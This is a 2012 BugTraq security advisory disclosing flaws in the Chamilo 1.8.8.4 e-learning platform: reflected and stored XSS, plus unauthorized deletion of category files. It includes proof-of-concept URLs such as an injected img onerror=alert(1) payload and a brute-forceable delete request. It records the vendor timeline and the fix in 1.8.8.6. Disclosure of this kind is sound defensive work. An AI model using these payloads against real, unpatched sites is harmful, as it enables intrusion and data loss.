BugTraq
Chamilo 1.8.8.4 Multiple Vulnerabilities Aug 25 2012 01:19AM
beford (xbefordx gmail com)
Chamilo 1.8.8.4 Multiple Vulnerabilities
========================

CVE: CVE-2012-4029
Issue: Reflected XSS PHP_SELF in third-party app, Stored XSS

* PHP_SELF XSS
http://chamilo-1.8.8.4/main/inc/lib/phpdocx/pdf/www/examples.php/'"><img

src=404 onerror=alert(1) >

* Stored XSS unfiltered input category_name

http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=LEETLANG&vi
ew=&action=addsentcategory

CVE: CVE-2012-4030
Issue: Unauthorized file delete

* Unauthorized file delete

You have to be subscribed to the course and you can delete other users
categories by bruteforcing the category ID.

http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=COURSEID&vi
ew_received_category=&view_sent_category=&view=&action=deletesentcategor
y&id=CATEGORYID

Vendor:
www.chamilo.org

Vendor informed:
Jul 16/2012

Vendor acknowledgement:
Jul 16/2012

Fix Released
Version 1.8.8.6 - Jul 20/2012

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus